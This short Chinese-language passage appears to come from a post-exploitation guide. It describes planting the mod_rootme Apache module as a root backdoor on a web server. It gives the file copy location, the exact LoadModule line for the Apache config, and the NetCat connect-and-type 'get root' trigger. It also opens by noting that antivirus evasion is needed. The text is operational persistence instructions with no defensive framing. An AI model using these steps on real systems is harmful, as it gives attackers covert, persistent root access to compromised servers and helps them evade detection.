需要配合免杀
在Web服务器上,可以安装mod_rootme Apache模块(GitHub - sajith/mod-rootme)以获取特权后门。尽管Apache通常不会以root身份运行,但mod_rootme利用预分叉钩子来利用主Apache进程在仍具有root权限时实现root访问。
编译完成后,将mod_rootme.so复制到Apache模块目录(通常为 /usr/lib/apache2/modules
),并将以下字符串添加到Apache配置文件中(通常为 /etc/apache2/apache2.conf
或/etc/httpd/conf/httpd.conf
):
LoadModule rootme_module /usr/lib/apache2/modules/mod_rootme.so
要使用后门,请使用NetCat连接到Apache并键入 get root
。